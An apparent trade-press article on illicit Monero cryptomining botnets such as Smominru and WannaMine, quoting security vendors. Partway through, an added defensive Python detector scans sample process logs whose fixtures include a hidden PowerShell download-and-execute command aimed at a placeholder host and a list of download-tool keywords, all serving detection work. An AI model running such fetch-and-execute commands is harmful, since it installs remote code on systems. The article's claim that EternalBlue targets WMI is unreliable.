Ransomware is so 2017. Today all the clever hackers have turned to illicit cryptomining to fill their coffers.
Thanks to the combination of a leaked NSA exploit, a cryptocurrency more anonymous than Bitcoin, and benign cryptocurrency transaction-processing software (known as "mining") that needs no command-and-control link back to the attacker, we now have the perfect recipe: easy money, minimal chance of detection, and billions of unsuspecting targets that may not even notice they have been compromised.
Criminals all over the world rejoice, still incredulous at how easy it is to make money while they sleep.
Assembling the pieces of the "perfect crime"
In early 2017, a group of hackers released into the wild a number of exploits created by the NSA, including EternalBlue, which made it easy to break into Microsoft Windows systems.
Meanwhile, cryptocurrency proponents dissatisfied with Bitcoin's lack of true anonymity developed Monero, an altcoin better able to hide the traces of criminal transactions. Guess what? The criminals love it.
The third component of this nefarious business: the fact that all blockchain-based systems rely on distributed transaction processors known as miners, who automatically receive a payment for their efforts in whichever cryptocurrency they choose to process.
Sulfur – saltpeter – charcoal – and bam! The global hacker community has just invented gunpowder: the ability to install illicit Monero miners on unsuspecting computers around the world.
Windows servers. Laptops. Android devices. Even IoT endpoints. Every one of them makes money for the bad guys every minute, day and night – all the bad guys, in fact, but especially the Russian and Chinese organized crime syndicates.
And you may have no idea you've been hacked, apart from occasional performance slowdowns and higher electricity bills. No ransom note. No stolen password files or credit card numbers. You may not even be able to convince anyone that there is a problem.
Unraveling the threat
The most pernicious aspect of illicit cryptomining is the way it flies under the radar of its victims. "In this new business model, attackers are no longer penalizing victims for opening an attachment or running a malicious script by taking systems hostage and demanding a ransom," explain Nick Biasini, Outreach Engineer; Edmund Brumaghin, Threat Researcher; Warren Mercer, Technical Leader; Josh Reynolds, Information Security Analyst; Azim Khodijbaev, Senior Threat Intelligence Analyst; and David Liebenberg, Senior Threat Analyst, all at Cisco Systems (the Talos team).
This attack vector is profitable and easy to assemble, a dangerous combination. "Increased buying power and liquidity are driving valuations, along with volatility, higher than ever," say Ryan McCombs, Senior Consultant; Jason Barnes, Senior Consultant; Karan Sood, Senior Security Researcher; and Ian Barton, Consultant, all at CrowdStrike.
As a result, illicit cryptomining is rapidly replacing ransomware as the attack vector of choice, especially as cybersecurity vendors bring ransomware protection to market. "What we're observing from a near-term and potentially long-term perspective is that the value of a computer with just a regular old CPU may be more simply to let some cryptocurrency miner run quietly, rather than infecting it with ransomware or some other software that could steal data," explains Ryan Olson, Intelligence Director at Palo Alto Networks.
Building a botnet
Large numbers of compromised systems working in concert, known as botnets, are a common hacker tool, as they can mount distributed denial-of-service attacks and various other attacks that require huge amounts of coordinated processing.
In the case of illicit cryptomining, however, each node operates independently of the others. Criminals simply need to install many miners, because each miner generates only a relatively small amount of money. "Talos has observed botnets made up of millions of infected systems, which … means that these systems could be exploited to theoretically generate over $100 million a year," continues the Talos team. "All of this has been done with minimal effort after the initial infection – more importantly, with little chance of being detected, this revenue stream can continue forever."
In fact, several exploits lead to different families of botnets. Perhaps the most pernicious has been nicknamed Smominru. "Proofpoint researchers have monitored the massive Smominru botnet, whose combined computing power has earned millions of dollars for its operators," explains Sandiford Oliver, Cybersecurity Researcher at Proofpoint, who goes by the pseudonym Kafeine. "Given the huge profits available to botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impact on infected nodes."
Smominru leverages the NSA's EternalBlue exploit, which targets Windows Management Instrumentation (WMI). Typically, the attacker runs a phishing campaign with a Microsoft Word file attached. Once the target downloads the file, it runs a Word macro that runs a Visual Basic script, which in turn runs a Microsoft PowerShell script that downloads and installs the miner executable.
Another popular cryptomining worm that exploits WMI weaknesses is WannaMine. "CrowdStrike has observed more sophisticated capabilities built into a cryptomining worm called WannaMine," says the CrowdStrike team. "Its fileless nature and use of legitimate system software such as WMI and PowerShell make it difficult, if not impossible, for organizations to block it without some form of next-generation antivirus."
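A defender-side hunt for the two patterns just described, the Office macro -> script host -> PowerShell download chain and PowerShell launched through WMI, as an added example that is not from the article or from any vendor it quotes. It runs over constructed Sysmon-style process-creation records; the process names, the download keywords and the assumption that WMI-launched commands appear as children of wmiprvse.exe are mine, not the page's.

```python
"""Hunt process-creation telemetry for two cryptominer delivery patterns:
Office document -> script host -> PowerShell download (Smominru-style), and
a shell launched under the WMI provider host (WannaMine-style, fileless).
All records below are constructed samples, not real telemetry."""

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line fragments that indicate a download stage (assumed list).
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "bitsadmin", "certutil")

# Constructed Sysmon-style records: (pid, ppid, image, command line).
# Paths, hostnames and 'miner.exe' are placeholders, not real indicators.
EVENTS = [
    (100, 1, "explorer.exe", "explorer.exe"),
    (200, 100, "winword.exe", 'winword.exe "invoice.docm"'),
    (300, 200, "wscript.exe", r"wscript.exe C:\Temp\x.vbs"),
    (400, 300, "powershell.exe",
     "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/m.ps1')"),
    (500, 400, "miner.exe", "miner.exe -o pool.example.invalid:3333"),
    (600, 1, "wmiprvse.exe", "wmiprvse.exe -secured -Embedding"),
    (700, 600, "powershell.exe", "powershell.exe -nop -w hidden -enc AAAA"),
    (800, 100, "winword.exe", 'winword.exe "report.docx"'),   # benign
    (900, 100, "powershell.exe", "powershell.exe Get-Process"),  # benign
]


def ancestry(events, pid):
    """Image names from pid up to the root: [child, parent, grandparent, ...]."""
    by_pid = {e[0]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against pid-reuse loops
        seen.add(pid)
        chain.append(by_pid[pid][2].lower())
        pid = by_pid[pid][1]
    return chain


def findings(events):
    """Return (pid, rule) pairs for processes that match a suspicious chain."""
    hits = []
    for pid, _ppid, image, cmdline in events:
        img, low = image.lower(), cmdline.lower()
        parents = ancestry(events, pid)[1:]        # ancestors only
        if img in SHELLS and OFFICE & set(parents) \
                and any(h in low for h in DOWNLOAD_HINTS):
            hits.append((pid, "office->script->shell download chain"))
        elif img in SCRIPT_HOSTS and parents and parents[0] in OFFICE:
            hits.append((pid, "office spawned script host"))
        elif img in SHELLS and parents and parents[0] == "wmiprvse.exe":
            hits.append((pid, "shell launched by WMI provider host"))
    return hits


if __name__ == "__main__":
    for pid, rule in findings(EVENTS):
        print(pid, " -> ".join(reversed(ancestry(EVENTS, pid))), rule)
```

The two benign records (a plain Word document and an interactively started PowerShell) are not flagged, which is the false-positive check any such rule needs before it goes into a SIEM.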
WMI, however, is not the only vulnerability. Some researchers report attacks via Microsoft SQL Server as well as Oracle and Google products.
Show me the money
The keystone that holds the entire nefarious enterprise together is the anonymous Monero cryptocurrency. "Bitcoin alternatives like Monero and Ethereum continue their general upward trend," continues Oliver, "placing them in the crosshairs of threat actors in search of fast profits and anonymous transactions."
While other cryptocurrencies play a role, Monero promises to be the favorite. "This Monero mining botnet is extremely large, consisting primarily of Microsoft Windows servers spread all over the world," says Kevin Epstein, Vice President of Proofpoint's Threat Operations Center. "We repeatedly see threat actors 'follow the money' – in recent months, the money has been in cryptocurrency, and the actors are turning their attention to a variety of illicit means to get both Bitcoin and alternatives."
Oliver makes the same point. "In the last year, we have observed stand-alone coin miners and coin-mining modules in existing malware proliferating rapidly," he says. "As Bitcoin has become prohibitively resource-intensive to mine outside dedicated mining farms, interest in Monero has increased dramatically."
The combination of simple botnets and anonymous cryptocurrency has led to an explosion of illicit activity. "Cryptocurrency miner payloads may be among the easiest money makers available to attackers," adds the Talos team. "There is no need to try to compromise hosts to steal documents, passwords, wallets or private keys, as we have become accustomed to seeing from financially motivated attackers."
Flying under the radar
In contrast to the direct assault of ransomware that plagues businesses, illicit cryptomining is decidedly benign. "It's largely unnoticed by most users," says the Talos team. "There is no command-and-control activity, and it generates revenue consistently until it is removed."
Command and control is the term for the way hackers "call home" once they reach their target, so that they can exfiltrate the goods – a step that is no longer necessary with illicit cryptomining. The miner software simply needs to carry the anonymous address of the attacker's cryptowallet.
What, in reality, is stolen? "The attackers steal nothing more than the computing power of their victims, and the mining software is not technically malware," continues the Talos team. "In theory, victims could remain part of the adversary's botnet for as long as the attacker chooses."
However, the theft of computing power (and the electricity it requires) is not entirely benign. "While cryptocurrency mining was generally viewed as a nuisance, CrowdStrike has recently seen several cases where mining has had an impact on corporate operations," adds the CrowdStrike team, "rendering some companies unable to operate for days and weeks at a time."
Proofpoint agrees. "Since most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure could be high, as could the cost of the much higher power consumption of servers running closer to capacity," says Oliver.
The future of illicit cryptomining
While the fact that this cyberattack flies under the radar may seem benign, it is actually the reason this attack strategy is so dangerous. Unlike ransomware, where companies demand fast mitigation technology from software vendors, illicit cryptomining attacks will be able to spread largely unchecked.
Over time, therefore, we can expect the number of compromised systems quietly making money for criminals to reach epidemic proportions. At some point the criminals will start tripping over each other, with multiple malicious actors trying to infect the same systems.
At that point, expect to see widespread "brownouts" in computing power, as large swaths of the global computing infrastructure collapse under the weight of multiple botnets, each building the fortunes of a different criminal enterprise somewhere in the world.
This problem is so pernicious, in fact, that software mitigation techniques may prove insufficient to stop its spread. Instead, governments may simply have to pull the plug on cryptocurrency once and for all.
Intellyx publishes the Agile Digital Transformation Roadmap posters, advises companies on their digital transformation initiatives, and helps vendors communicate their agility stories. At the time of writing, Microsoft is an Intellyx customer. None of the other organizations mentioned in this article are Intellyx customers. Image credit: public domain.